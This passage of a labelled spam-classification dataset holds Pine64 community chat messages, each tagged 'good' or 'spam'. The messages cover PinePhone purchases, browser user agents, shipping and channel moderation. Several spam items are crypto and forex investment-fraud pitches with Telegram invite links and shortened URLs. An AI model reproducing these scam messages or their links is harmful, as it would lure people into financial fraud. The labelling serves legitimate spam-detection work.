you are on android, which blocks that part of the site form access\nim sure i could fake it but the thought was see what teh community uses before i go poking\nim sure i could fake it but the thought was see what the community uses before i go poking\n", "category": "good"}, {"text": "Useragent changer addons can be made to work on a per site basis\nIm sure its possible in both firefox and chrom*um\n", "category": "good"}, {"text": "so far havent installed firefox\nwas checking it out on \"anglefish\"\n", "category": "good"}, {"text": "It looks more mobile friendly\nI dont own a pinephone\nBut you could try firefox too and also falkon\n", "category": "good"}, {"text": "yea i just got mine and im poking around seeign what the default OS looks like bfore i flash the multi image on it and go looking around\n", "category": "good"}, {"text": "Im more interested in the smartwatch\n", "category": "good"}, {"text": "i messed up and didnt pay for the good shipping on my watch\nits not here yet\n", "category": "good"}, {"text": "Shipping is very expensive\nIll buy 3 if the shipping costs as much as one\n", "category": "good"}, {"text": "yea... still the phone shipped out all of 2 days ago\nand the better shipping had it here in that time\n", "category": "good"}, {"text": "Would it be possible to make firefox for desktop have the mobile style of tabs via extensions?\n", "category": "good"}, {"text": "Anyone tried to get a dual sim card adapter working?\n", "category": "good"}, {"text": "Forwarded from derek:\n", "category": "good"}, {"text": "\ud835\ude44\ud835\ude69 \ud835\ude62\ud835\ude56\ud835\ude60\ud835\ude5a\ud835\ude68 \ud835\ude62\ud835\ude5a \ud835\ude5d\ud835\ude56\ud835\ude65\ud835\ude65\ud835\ude6e \ud835\ude69\ud835\ude5a\ud835\ude61\ud835\ude61\ud835\ude5e\ud835\ude63\ud835\ude5c \ud835\ude65\ud835\ude5a\ud835\ude64\ud835\ude65\ud835\ude61\ud835\ude5a \ud835\ude56\ud835\ude57\ud835\ude64\ud835\ude6a\ud835\ude69 \ud835\ude69\ud835\ude5d\ud835\ude5e\ud835\ude68 \ud835\ude6c\ud835\ude64\ud835\ude63\ud835\ude59\ud835\ude5a\ud835\ude67\ud835\ude5b\ud835\ude6a\ud835\ude61 \ud835\ude5e\ud835\ude63\ud835\ude6b\ud835\ude5a\ud835\ude68\ud835\ude69\ud835\ude62\ud835\ude5a\ud835\ude63\ud835\ude69 \ud835\ude58\ud835\ude64\ud835\ude62\ud835\ude65\ud835\ude56\ud835\ude63\ud835\ude6e \ud835\ude69\ud835\ude5d\ud835\ude56\ud835\ude69 \ud835\ude5d\ud835\ude56\ud835\ude68 \ud835\ude65\ud835\ude56\ud835\ude5e\ud835\ude59 \ud835\ude62\ud835\ude5a \ud835\ude62\ud835\ude56\ud835\ude63\ud835\ude6e \ud835\ude69\ud835\ude5e\ud835\ude62\ud835\ude5a\ud835\ude68 \ud835\ude56\ud835\ude63\ud835\ude59 \ud835\ude58\ud835\ude5d\ud835\ude56\ud835\ude63\ud835\ude5c\ud835\ude5a\ud835\ude59 \ud835\ude62\ud835\ude6e \ud835\ude61\ud835\ude5e\ud835\ude5b\ud835\ude5a\nAll thanks to Sir Scott Anderson\n\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\n@PROFITS_WITH_SCOTT\nhttps://t.me/joinchat/agtFal51AgVkMTI0\nhttps://t.me/joinchat/agtFal51AgVkMTI0\n", "category": "spam"}, {"text": "It will take some time, especially with the shipping backups at major ports\nI've been waiting a month for a NAS box\nHopefully only takes another month at most to arrive\n", "category": "good"}, {"text": "Forwarded from unknown: I was referred to this platform by a friend online.i thought it was a scam. Company...but I was moved to try and here I earned.i just want to share this to you guys.\n@fx_hubert_jason\n\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\nhttps://t.me/joinchat/HIVqYoriY901MmRh\n", "category": "spam"}, {"text": "Forwarded from unknown: I now make money from the comfort of my home all thanks to @fx_hubert_jason , you too can contact him and also make money from home\nDm:@fx_hubert_jason\nLink:https://t.me/joinchat/HIVqYoriY901MmRh\n", "category": "spam"}, {"text": "Invertir en criptomonedas es realista, pero se perdi\u00f3 un 95%. HASHBULLS ES RECONOCIDOhttps://cleanuri.com/9EPBdLhttps://cleanuri.com/9EPBdL :\n", "category": "spam"}, {"text": "No soy hablo\nthat's ok, I will be fine with tabasco or ketchup\n:P\n", "category": "good"}, {"text": "I'd recommend editing the user agent in `about:config`\nLeave everything the same, but *specifically* replace \"Android\" with \"Linux\"\nMany websites will stop trying to harass you about android apps but will still present their mobile UIs\n", "category": "good"}, {"text": "Better install an user agent switcher add-on. Sites detect the presence of a mobile phone in different ways, changing the user agent back to desktop will break a large amount of sites.\n", "category": "good"}, {"text": "This does not change the user agent to desktop\nThe user agent string in this case still contains the word \"Mobile\", which appears to be what any site I've encountered thus far is relying on\nif not the dimensions of screen, etc.\n", "category": "good"}, {"text": "me and my buddy want to order 2 devices, but there is 1 device limit per order, is it possible to make it 2 cuz we are 2 persons? order is in EU\n", "category": "good"}, {"text": "have you tried..\nchanging privacy.resistFingerprinting to True?\nBecause that'll make the userAgent show Windows NT\nyerbkhan I think you'd have to order them separately unfortunately\nit's a carrier limit, not an arbitrary limit pine64 makes\n", "category": "good"}, {"text": "yeah it's an issue of what they can send in the package, noy who orders it\n", "category": "good"}, {"text": "To be fair, for the EU warehouse that doesn't apply, they are holding a stock there. But Pine probably can't or won't make the order process region-specific\n", "category": "good"}, {"text": "wait that actually works? I'd have assumed that they were just using the fact that it's a mobile layout to decide to shill the app\n", "category": "good"}, {"text": "Based on my experience, they're just looking for the word \"Android\" in the user a gent\nBased on my experience, they're just looking for the word \"Android\" in the user agent\n", "category": "good"}, {"text": "huh\n", "category": "good"}, {"text": "Nothing is more annoying than reddit trying to thrust it's app upon me, imo XD\nNothing is more annoying than reddit trying to thrust its app upon me, imo XD\n", "category": "good"}, {"text": "might not be a bad idea to put this in a PR\n", "category": "good"}, {"text": "I think that'd be a better default user agent personally\nalso more technically accurate X3\n", "category": "good"}, {"text": "if ti stops the app shilling then it already significantly improves the experience\n", "category": "good"}, {"text": "If you have Bitcoin Wallet chat me for investment\n$50 profit $550\n$100 profit $1500\n$200 profit $2500\n$300 profit $3500\n$400 profit $4500\n$500 profit $5500\n$600 profit $6600\n$700 profit $7700\nPROFIT IN 24 HOURS\nNo hidden charges\nYou can make money online without depending on your salary..Do you have a PC or a phone... Try this and gain financial freedom...click on the link below\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\n@diannabrooks4\n@diannabrooks4\n", "category": "spam"}, {"text": "Yo? Thats me lmao\n", "category": "good"}, {"text": "Thank you for the kind words\n", "category": "good"}, {"text": "https://t.me/joinchat/FKbe8WVxS6szMmE8\nhttps://t.me/joinchat/FKbe8WVxS6szMmE8\n@PROFITS_WITH_SCOTT\n", "category": "spam"}, {"text": "telegram seems fun\n\ud83d\ude1b\n", "category": "good"}, {"text": "coin toss\n", "category": "good"}, {"text": "Just get both\n", "category": "good"}, {"text": "Forwarded from unknown: I must confess that Forex trading still pays with a trust worthy manager that's why i'm proud of Mr Victor cordeiroi and you have full knowledge of what Forex is all about. He is indeed a helper and a God sent who always keeps to his words.I must say a very big thank you because you really changed my life and ambitions am indeed greatful and must always recommend you to everyone\nClick the link to stay connected with him\n\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\n@Victorcordeiroi1\nhttps://t.me/joinchat/vVAqSN6oo01mMGJk\n", "category": "spam"}, {"text": "If you have Bitcoin Wallet chat me for investment\n$50 profit $550\n$100 profit $1500\n$200 profit $2500\n$300 profit $3500\n$400 profit $4500\n$500 profit $5500\n$600 profit $6600\n$700 profit $7700\nPROFIT IN 24 HOURS\nNo hidden charges\nYou can make money online without depending on your salary..Do you have a PC or a phone... Try this and gain financial freedom...click on the link below\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\n@Nesvquez4\n@Nesvquez4\n", "category": "spam"}, {"text": "Hi! I'm looking at buying a PinePhone but wondering where you can get apps for it and if there is a list that I can look at?\n", "category": "good"}, {"text": "are you familiar with using linux on a desktop or laptop? it's basically the same process\nthere's not really an \"app store\" like you find on iOS or android\nthough most of the interfaces you can use on the pinephone have a sort of \"app store\" looking thing that is a front end for the linux repositories\n", "category": "good"}, {"text": "depends on which OS you run on it\nfor Ubuntu Touch there is https://open-store.io\n", "category": "good"}, {"text": "Is there anyone I can chat with on the neural network & NPU side?\nwould love some advice \ud83d\ude42\nhttps://www.programmerall.com/article/81411814491/\n", "category": "good"}, {"text": "i have boot questions can anyone help answer them? Because Google answers are too technical for me\ni have boot questions can anyone help answer them? Because Google answers are too complicated for me\n", "category": "good"}, {"text": "My pleasure. That was a very well written piece of tech journalism.\n", "category": "good"}, {"text": "CRYPTOBRITE.LTD es la mejor plataforma para invertir. Creo que has estado viendo muchos testimonios pero puedes confirmar todos estos a trav\u00e9s de \ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47 CRYPTOBRITE.LTD https://cryptorite.ltd :\n", "category": "spam"}, {"text": "Forwarded from unknown: It wasn't easy but trader maya made it possible, another payout today thank you. contact he for more information\n\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\nhttps://t.me/joinchat/MoKqLSPo8e1iYjRk\n", "category": "spam"}, {"text": "easy to join, hard to automatically moderate\n", "category": "good"}, {"text": "It does, but no one cares about this network right now.\n", "category": "good"}, {"text": "the telegram channels are globally accessible, while you need to join the network to access the channels on IRC\n", "category": "good"}, {"text": "there was actually spam on IRC yesterday. someone pointed a spambot at us through the tor network and blasted this channel with messages from about 100 clients\nsomehow it didn't make it across the bridge. i don't really know why.\nbut normally, yea IRC doesn't really get spam because it's too small of a network\nactually... that wasn't public messages wasn't it. it was whispers and DMs just to me and abcde (one of the ops on the IRC network, for those not on it)\nthat would be why it didn't cross the bridge \ud83d\ude42\nbut if you have IRC logs in this channel from about 32 hours ago, you'll see a shit ton of joins and then leaves from users with \"real\" names\nthe bot master seems to have done it to advertise their turkish dating chat site (i'm not kidding...) in their quit message\nthe bots weren't even spamming anything about that, their flood message was just keyboard mashing\nwhole thing is very confusing\n", "category": "good"}, {"text": "@fireTwoOneNine what was the message? i didn't get it :P\nbut i see that the irc server seems to do it's job well\nhttps://cdn.discordapp.com/attachments/463285150898192384/901321809910181909/Screenshot_20211023_111057.png\n", "category": "good"}, {"text": "they're M2 screws\nhttps://wiki.pine64.org/wiki/Pinebook_Pro#Case_Dimensions_and_Data\n", "category": "good"}, {"text": "@fireTwoOneNine as for joining over VPN or Tor, how about something like authentication over sasl?\n", "category": "good"}, {"text": "as for the spam message, it was this\nhttps://cdn.discordapp.com/attachments/463285150898192384/901322257127841822/unknown.png\n", "category": "good"}, {"text": "lolwhat\nis the \"byeee\" quit message a part of the irc server kicking?\n", "category": "good"}, {"text": "non-printable characters\n", "category": "good"}, {"text": "it's unicode 0xFFFD\n", "category": "good"}, {"text": "literal name being 'REPLACEMENT CHARACTER' lol\n", "category": "good"}, {"text": "i can only assume it's a text encoding or padding fail\n", "category": "good"}, {"text": "most likely encoding cause it looks like it was trying to do a line break but failed for some reason\n", "category": "good"}, {"text": "that's more of a #pinebook question. but off the top of my head, suspend to RAM is a bit of a weird case where it kinda works and kinda doesn't\nthere will be people in that channel who can answer better than i can\n", "category": "good"}, {"text": "@fireTwoOneNine but yeah, if you want you can setup sasl, so people that already had a nickserv account can login over tor or a vpn\nthis is what libera chat did and it seems to work\n", "category": "good"}, {"text": "i might have to look into that if this becomes a recurring problem\nhigher priority for now is finding a way to stop (or at least slow down) the telegram spam\nother than just using someone else's bot and hoping it doesn't get taken over maliciously (not an uncommon thing with telegram bots sadly)\n", "category": "good"}, {"text": "Doesn't Telegram have an option to verify by CAPTCHA or something similar?\n", "category": "good"}, {"text": "there are bots that do something like that\nbut it's not a native feature afaik\n", "category": "good"}, {"text": "ahh ok, digging a little deeper that does seem to be the only option atm; can only hope that they implement a native feature for it \ud83e\udd1e\n", "category": "good"}, {"text": "depends on how crazy we'd want to go\njust going off a word blacklist would be fairly effective (the telegram spam is pretty consistent)\nbut it could backfire if a legit user says the wrong thing\nhm, that looks like it could be useful. might be an excuse to play with making a telegram bot this weekend \ud83d\ude42\nthanks. looks pretty straightforward to use though\nthough it may still have the problem of the bridge catching a message before this bot could delete\nespecially if the classifier can take a while (i have no idea; basically asking you there \ud83d\ude42 )\ni was just wondering the same thing. not sure if matterbridge has such an option. technically we could custom compile with a hardcoded delay, but that's obviously non-ideal\nlicense is the least of my worries there. MIT works just fine for me\nlooks like matterbridge has some delay controls for IRC, but that's it\nlmao\nthe matterbridge config is already enough of a nightmare, thanks \ud83d\ude42\npretty sure we have the biggest deployment of it anywhere\ni suppose i could expand the bot scope to connect to all the chat platforms and delete on those platforms if necessary\ni don't know\nthat's true\nIRC already gets the short end of that stick\nis that an irc 2.0 feature? \ud83d\ude42\nhell of a race condition to set up there. telegram bots have to get and send messages (or literally any action) over HTTP\ndon't know how often matterbridge polls that either\nmatterbridge does make use of the bot API for talking to telegram, yes\nsee ya\n", "category": "good"}, {"text": "might also be useful to filter images\njust delete messages that have an image matching the checksum of the damn elon musk twitter screenshots they send\nI haven't checked but they probably do\n", "category": "good"}, {"text": "hi\ndoes clusterboard control ATX somehow or it just always on?\n", "category": "good"}, {"text": "in geekbench*\n", "category": "good"}, {"text": "I learnt to manage portfolio at HASHBULLS\ud83d\udccc\ud83d\udccc\ud83d\udccc\ud83d\udccc\ud83d\udccc\ud83d\udccchttps://trhs.me/k4PZJhttps://trhs.me/k4PZJ :\n", "category": "spam"}, {"text": "Forwarded from unknown: I must confess that Forex trading still pays with a trust worthy manager that's why i'm proud of Mr Victor cordeiroi and you have full knowledge of what Forex is all about. He is indeed a helper and a God sent who always keeps to his words.I must say a very big thank you because you really changed my life and ambitions am indeed greatful and must always recommend you to everyone\nClick the link to stay connected with him\n\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\n@Victorcordeiroi1\nhttps://t.me/joinchat/vVAqSN6oo01mMGJk\n", "category": "spam"}, {"text": "@Moderator spam invasion \ud83d\ude04\n", "category": "good"}, {"text": "i eat spam for dinner\nliterally. i just had spam in rice for dinner\n", "category": "good"}, {"text": "at least it's just in general \ud83d\ude1b\n", "category": "good"}, {"text": "lol... too slow \ud83d\ude1b\n", "category": "good"}, {"text": "hi @NotThatDarnFrogAgain\nwe need to watch some videos together\n", "category": "good"}, {"text": "That was a particularly spammy spam though...\n", "category": "good"}, {"text": "the spammiest spam\n", "category": "good"}, {"text": "Sounds like a perfect use for the rockpro64... mine is running as a NAS with to attached USB hard drives... has been running for nearly three years now 24x7... running docker containers, home assistant, and a few other bits an pieces... only issues I've had are usually self-inflicted ;)\n*two\n", "category": "good"}, {"text": "Nvidia will be looking to make high end CPUs is what I am suspecting. Think gaming computer levels of performance.\n", "category": "good"}, {"text": "mine shipped from poland iirc, ye\n", "category": "good"}, {"text": "morning GMT\nwhat's the preferred way to get the HDMI output to fit a TV screen? disable_overscan in /boot/armbianEnv.txt didn't help.\n(rockpro64/stock Ubuntu/No X11)\n", "category": "good"}, {"text": "2x4TB USB3 Seagate Expansion drives plugged directly into the the rockpro64 for bulk storage. Samsung NVMe on PCIe riser for secondary NAS storage, docker containers, etc. EMMC boot, with Samsung EVO microSD as backup (yet to need). Still have the USB2 and TypeC ports free if I really need to plug anything else in. Poor thing is still running 4.4 kernel from 2018... why fix what ain't broke \ud83d\ude06 .\nhm... thought it was the other way around... ok, so it's 2xUSB3 drives plugged into the 2xUSB2 ports, leaving the USB3 and TypeC free.\nFor it's intended purpose (bulk video/music storage) the USB2 ports are more than enough for my needs, with the NVMe drive doing any high speed stuff, since it can basically saturate the ethernet link...\nYes, although they and the RP64 are both common-powered via a 12v solar battery supply.\n", "category": "good"}, {"text": "Could also just plug both drives directly into the rockpro through the 3.0 type a and type c ports\n", "category": "good"}, {"text": "I have a second rockpro64, USB3 hub, and another pair of 4TB drives (they are the offline backups of the two that are in service)... I can always run that up and see what happens.\nThat would defeat the \"don't fix what ain't broke\" adage \ud83d\ude1b\n", "category": "good"}, {"text": "I thought there are 0 taxes (re @p64protocolbot: [D] They don't live in delaware? \ud83d\ude04)\n", "category": "good"}, {"text": "having like an extra hundred bucks slapped on top of it yikes\n", "category": "good"}, {"text": "It's put to good use, mostly \ud83d\ude1b\n", "category": "good"}, {"text": "something something healthcare \ud83d\ude1b\n", "category": "good"}, {"text": "That's what I first wrote in the chatbox but I removed it before sending it. \ud83d\ude04\n", "category": "good"}, {"text": "I had a pine book pro I sold to a person in Europe who had me ship it to Delaware. They then forwarded it to the country where the buyer lives, think it was the Ukraine. (re @ideasquarebased: Why not to ship it to Delaware)\n", "category": "good"}, {"text": "You still need to pay import taxes if you import it into the single market, even if it's forwarded via wherever. Otherwise it is tax evasion \ud83d\ude09\nFor countries like Russia they use forwarding services because customs block the orders otherwise\n", "category": "good"}, {"text": "https://twitter.com/alyssarzg/status/1452082622876815361 heh TIL\n", "category": "good"}, {"text": "the 3399 has pretty healthy memory bandwidth for what it is\nthe M1 is just.... well, the M1\n", "category": "good"}, {"text": "How do you even pay import tax i live in us\nI don't want to get in trouble for not knowing how to get my pinephone paid for\n", "category": "good"}, {"text": "the shipping company will ask you to pay tax if it's required\n", "category": "good"}, {"text": "That would probably be by email then\nThank you\n", "category": "good"}, {"text": "spicyoreo: The US has no import tax, as far as I'm aware\nThe above discussion was about the EU import tax\n", "category": "good"}, {"text": "Maybe google it\nCustoms Duty is a tariff or tax imposed on goods when transported across international borders. ... American Goods Returned (AGR) do not have to be declared, but you must be prepared to prove to U.S. Customs and Border Protection the articles are AGR or pay Customs duty. The Customs Duty Rate is a percentage.\nhttps://www.cbp.gov \u203a travel \u203a kbyg\nhttps://www.cbp.gov/travel/international-visitors/kbyg/customs-duty-info\n", "category": "good"}, {"text": "That's not really helpful\n", "category": "good"}, {"text": "Whatever bud\n", "category": "good"}, {"text": "spicyoreo: all you have to pay is the shipping costs\n", "category": "good"}, {"text": "What is the \"transit airport\"? Is that the countries airport they're shipping it from? Or is it in my country? cause my watch just arrived at the transit country\n", "category": "good"}, {"text": "that's up to your postal carrier but I assume it's the postal hub they're routing through\n", "category": "good"}, {"text": "Hmm, you think my watch will most likely be here this week or next week then?\n", "category": "good"}, {"text": "probably? again, depends on your postal carrier :P\nall you can do is wait, I'm afraid\n", "category": "good"}, {"text": "Gahhh the thing i hate doing the most too lol\n", "category": "good"}, {"text": "Well normally I only get things shipped from two places usps or ups\nWell normally I only get things shipped from two couriers usps or ups\n", "category": "good"}, {"text": "I finally got Arch Phos to work with the Pinephone! \ud83c\udf8a\nIt runs alot faster than the default Majaro Plasma\nDoes Brave have a linux client yet that could work for mobile devices?\n", "category": "good"}, {"text": "\\>Le shill lion\n", "category": "good"}, {"text": "Do you have a better recommendation for a privacy-based web browser that doesn't utilize TOR by default?\nI prefer Lokinet over TOR regardless since most, if not all, TOR exit nodes by now are comped\n", "category": "good"}, {"text": "hi\nabout time I joined here\n", "category": "good"}, {"text": "I dont know if this was done before but you can configure the firefox tab bar using userchrome.css\nFirefox is still awesome\n", "category": "good"}, {"text": "Hello\n", "category": "good"}, {"text": "Argentina someone?\n", "category": "good"}, {"text": "Success comes to those who work hard to get it...Most people here are looking for free investment unknowning to you that there is an upfront fees waiting for you while some just sit there doubting while wise ones are getting rich...There are no hidden charges contact Mr LeonWilliamsFx today via the link below to earn big\n\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\n@LeonWilliamsFx\n@LeonWilliamsFx\n", "category": "spam"}, {"text": "Forwarded from unknown: My company need 30 people to come and work online for 3 days and receive $10,000 in 3 business days using your smartphone?\nJust say HOW!!! Or contact him via this link below\n\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\n@Harrison_S_George\nhttps://t.me/joinchat/wqWNTv90pc81MWI0\nStay at home and make money online\n", "category": "spam"}, {"text": "I knoowwwww, i constantly do this when ordering stuff lol, hell i even wrote a script for it ```\n~/Programming/python > ./track.py\n[*] Sending request...\nID: \n2021-10-26 14:44 ( The shipment is handed over in bulk, final acceptance of goods to be confirmed )\n2021-10-24 13:04 ( The item has arrived in the transit airport )\n2021-10-20 06:49 ( The item is ready for shipment )\n2021-10-20 06:46 ( The item is pre-advised to PostNL )\n2021-10-19 06:51 ( The Item is at the shippers warehouse )\n~/Programming/python >\n```\n", "category": "good"}, {"text": "do they provide an api for this?\n", "category": "good"}, {"text": "sadly not, just a web scraper\nactually\nthey dop\nnevermind'\nAlthough annoyingly i have to normally load in the web page *then* the API works for some reason\n", "category": "good"}, {"text": "A watched pot never boils, @Philpax \ud83d\ude1b\n", "category": "good"}, {"text": "exactly :D\n", "category": "good"}, {"text": "Every time I see the announcement, I expect keyboard in stock\n\ud83d\ude2b\n", "category": "good"}, {"text": "Null must feel very betrayed, all the random stuff coming up\nPinePhone Pro etc. \ud83d\ude1b\n", "category": "good"}, {"text": "yea October end is near\n", "category": "good"}, {"text": "thanks mr 33yn2\n", "category": "good"}, {"text": "Wasn't me\n", "category": "good"}, {"text": "\ud83d\udc40\nIt was fire\n", "category": "good"}, {"text": "Interested members should click on the link below and chat me up for more information. https://soo.gd/qB4a :\n", "category": "spam"}, {"text": "Too bad no one's interested\n", "category": "good"}, {"text": "that's a different one\n", "category": "good"}, {"text": "Yeah it is\nI'm sad that they used the name PineCone on nutcracker thing. I was really looking forward to the PineCone Smart Speaker\n", "category": "good"}, {"text": "but with a pinephone\nhttps://cdn.discordapp.com/attachments/463285150898192384/902624588272386058/iu.png\n", "category": "good"}, {"text": "Pinegirlfiend?\n", "category": "good"}, {"text": "> <@p64protocolbot:matrix.org> [D] Pinegirlfiend?\nGood idea\nGreat idea\n", "category": "good"}, {"text": "Wait I don't think most guys want their gf to be \"free and open source\"\n", "category": "good"}, {"text": "please don't\n", "category": "good"}, {"text": "hey lads, do you think the rk3588 will be pin compatible with the 3568?\n", "category": "good"}, {"text": "most likely not\ni don't exactly have datasheets for the 3588, but it almost certainly has more peripherals, which means it needs more pins\n", "category": "good"}, {"text": ":(\nI wanted to try to get a head start designing something\nI guess I'll keep waiting for the rk3566 to show up on aliexpress\n", "category": "good"}, {"text": "hello guys\ni need help very fast\n", "category": "good"}, {"text": "Spit it out\n", "category": "good"}, {"text": "i just order now pinephone\nbut i see pinephone pro\non pre order\nand now i want to change it huys\nguys\nhow i can do that ?\n", "category": "good"}, {"text": "The Pro isn't released yet, the pre-order is for a few dev devices\nYou can cancel your order, the terms of the store has the details\nBut again, the Pro is not released yet \ud83d\ude1b\n", "category": "good"}, {"text": "whats you mean ?\ni can order this and wait no ?\nor its just for developer ?\n", "category": "good"}, {"text": "It's only for developers\n", "category": "good"}, {"text": "okk right\nbut its on road\n", "category": "good"}, {"text": "You may order a PinePhone. You may not order the PinePhone Pro yet.\n", "category": "good"}, {"text": "how much can its take ?\n", "category": "good"}, {"text": "If the order has shipped, you almost certainly are not receiving a PinePhone Pro.\n", "category": "good"}, {"text": "i just ship today\ni want to change that\n", "category": "good"}, {"text": "When did you order, Bach?\n", "category": "good"}, {"text": "today\nnow\none hour\n", "category": "good"}, {"text": "Just cancel it, it didn't ship yet\nAre you in the EU, Bach?\n", "category": "good"}, {"text": "ok and for pro version\nyes\n\ud83c\uddeb\ud83c\uddf7\nwhy ?\nhow much time before i get pro versiob guys ? if i ordering tomorow\n", "category": "good"}, {"text": "You can't order the Pro, it's not released \ud83d\ude04\nPre-order starts some time in November\n", "category": "good"}, {"text": "oh ok\n", "category": "good"}, {"text": "Hello everyone.\n", "category": "good"}, {"text": "so i just gonna order pinephone and wait for realease\nif i understand\n", "category": "good"}, {"text": "Or you cancel and wait, yes\n", "category": "good"}, {"text": "When will be the pinebook pro be available to order?\n", "category": "good"}, {"text": "oh ok\nhow much time we can wait for the pro ?\n", "category": "good"}, {"text": "Make sure to read https://www.pine64.org/pinephonepro/\n", "category": "good"}, {"text": "I have been looking to get one but is currently out of stock. Is there any date announce for when this product will be available\nThank you\n", "category": "good"}, {"text": "jptagaio: not you, there are some discussions mixing up \ud83d\ude1b\n", "category": "good"}, {"text": "I was just thank for listening \ud83d\ude05\n", "category": "good"}, {"text": "jptagaio: https://www.pine64.org/availability-and-shipping-status/ says Q4 2021 or Q1 2022\n", "category": "good"}, {"text": "I was just thank you for listening \ud83d\ude05\n", "category": "good"}, {"text": "Oh I was in the wrong column, I mean Q1 2022\n", "category": "good"}, {"text": "Ok so only next year\nOk thank you\nI hope to be able to get one \ud83d\ude05 I love the arm processor. And it is basically a Raspberry Pie with a battery\nI hope to be able to get one \ud83d\ude05 I love the arm processor. And it is basically a Raspberry Pi with a battery\n", "category": "good"}, {"text": "PLEEEAASSEEE Q4 20201\n", "category": "good"}, {"text": "the real question - which comes first, the steam deck or the pinephone pro?\nQ1 2022 is going to be a good quarter for Linux\n", "category": "good"}, {"text": "steam deck\n", "category": "good"}, {"text": "I'm wondering if we'll see people using pinephone pros with keyboard attachments running as input devices for the steam deck\n", "category": "good"}, {"text": "Do we know the release window for Pinephone Pro Explorer Edition?\n", "category": "good"}, {"text": "Whenever half life 3 gets released\n", "category": "good"}, {"text": "Hmm, I don't remember subscribing to a cryptocurrency channel...\n", "category": "good"}, {"text": "Explorer edition is coming either in the next couple months this year or the start of next year\n", "category": "good"}, {"text": "I saw the Interview about the PPP, so hopefully Luke knew what he was saying when he claimed that Pine had gotten enough inventory to weather the chip shortage and that we don't end up with \"where is the PS5\" situation.\n", "category": "good"}, {"text": "Lmao the ps5\nnothing will be that bad again\n", "category": "good"}, {"text": "Hi guys! I'm from Russia. Can I order PinePhone with delivery to Russia?\nI didn't find anything on the site.\n", "category": "good"}, {"text": "archlinux.org runs on an arch server btw \ud83d\ude1b\n", "category": "good"}, {"text": "yeahh anything rolling release on a server sketches me out though, i run proxmox and debian on mine\n", "category": "good"}, {"text": "Nothing wrong as long as you don\u2019t rely on software that breaks often. In my case it\u2019s just a Minecraft server next to my couch\n", "category": "good"}, {"text": "Introducing Pal Infinite Plus!\n", "category": "good"}, {"text": "Fair enough, i run my DNS server, websites and stuff on it lol\nso a bit more important\n", "category": "good"}, {"text": "Hello, I plan to use pine64 hardware to validate a new block-chain in a sustainable way with low power devices such as RP64 and coming soon Quartz64. I read brand and logo guidelines https://wiki.pine64.org/wiki/PINE64_brand_and_logo and I was wondering whom to ask. Thanks for your answer.\n", "category": "good"}, {"text": "assuming it's non-commercial, i think that it's allowable as \"software [that] is compatible with PINE64 hardware\"\n", "category": "good"}, {"text": "As far as trademarks in the US, you can use the term \"Pine64\" as long as there is no \"likelihood of confusion\". E.g. you can say \"Tested to work with Pine64\" but not use Pine64 in the name of the project (generally speaking). The logo might be usable under fair use but it depends on the circumstances.\nFor example, it's probably fair use to include the logo in a \"compatible with\" section, but not on a coffee mug as another example.\nYou can contact info@pine64.org if you want to get permission first\n>>> Commercial use of the logo, logotype or brand name, as well as any derivatives or alterade logotypes, is not permitted without prior consent of Pine Store Ltd. This means that any software project, merchandise vendor or community endeavour that seeks to turn a financial profit based on the PINE64 brand name needs to first acquire appropriate consent from Pine Store Ltd.\nThis is an interesting thing from their terms. As far as I know, US law doesn't allow companies to require pre-approval for trademark use. But it could be different depending on where you live.\n>>> Commercial use of the logo, logotype or brand name, as well as any derivatives or alterade logotypes, is not permitted without prior consent of Pine Store Ltd. This means that any software project, merchandise vendor or community endeavour that seeks to turn a financial profit based on the PINE64 brand name needs to first acquire appropriate consent from Pine Store Ltd.\nThis is an interesting thing from their terms. As far as I know, US law doesn't allow companies to require pre-approval for trademark use. But it could be different depending on where you live.\n>>> Commercial use of the logo, logotype or brand name, as well as any derivatives or alterade logotypes, is not permitted without prior consent of Pine Store Ltd. This means that any software project, merchandise vendor or community endeavour that seeks to turn a financial profit based on the PINE64 brand name needs to first acquire appropriate consent from Pine Store Ltd.\n<<<\nThis is an interesting thing from their terms. As far as I know, US law doesn't allow companies to require pre-approval for trademark use. But it could be different depending on where you live.\n>>> Commercial use of the logo, logotype or brand name, as well as any derivatives or alterade logotypes, is not permitted without prior consent of Pine Store Ltd. This means that any software project, merchandise vendor or community endeavour that seeks to turn a financial profit based on the PINE64 brand name needs to first acquire appropriate consent from Pine Store Ltd.\n<<<\nThis is an interesting thing from their terms. As far as I know, US law doesn't allow companies to require pre-approval for trademark use. But it could be different depending on where you live.\n>>> Commercial use of the logo, logotype or brand name, as well as any derivatives or alterade logotypes, is not permitted without prior consent of Pine Store Ltd. This means that any software project, merchandise vendor or community endeavour that seeks to turn a financial profit based on the PINE64 brand name needs to first acquire appropriate consent from Pine Store Ltd.\n<<<\nThis is an interesting thing from their terms. As far as I know, US law doesn't allow companies to require pre-approval for trademark use. But it could be different depending on where you live.\n>>> Commercial use of the logo, logotype or brand name, as well as any derivatives or alterade logotypes, is not permitted without prior consent of Pine Store Ltd. This means that any software project, merchandise vendor or community endeavour that seeks to turn a financial profit based on the PINE64 brand name needs to first acquire appropriate consent from Pine Store Ltd.\n>>>\nThis is an interesting thing from their terms. As far as I know, US law doesn't allow companies to require pre-approval for trademark use. But it could be different depending on where you live.\n>>> Commercial use of the logo, logotype or brand name, as well as any derivatives or alterade logotypes, is not permitted without prior consent of 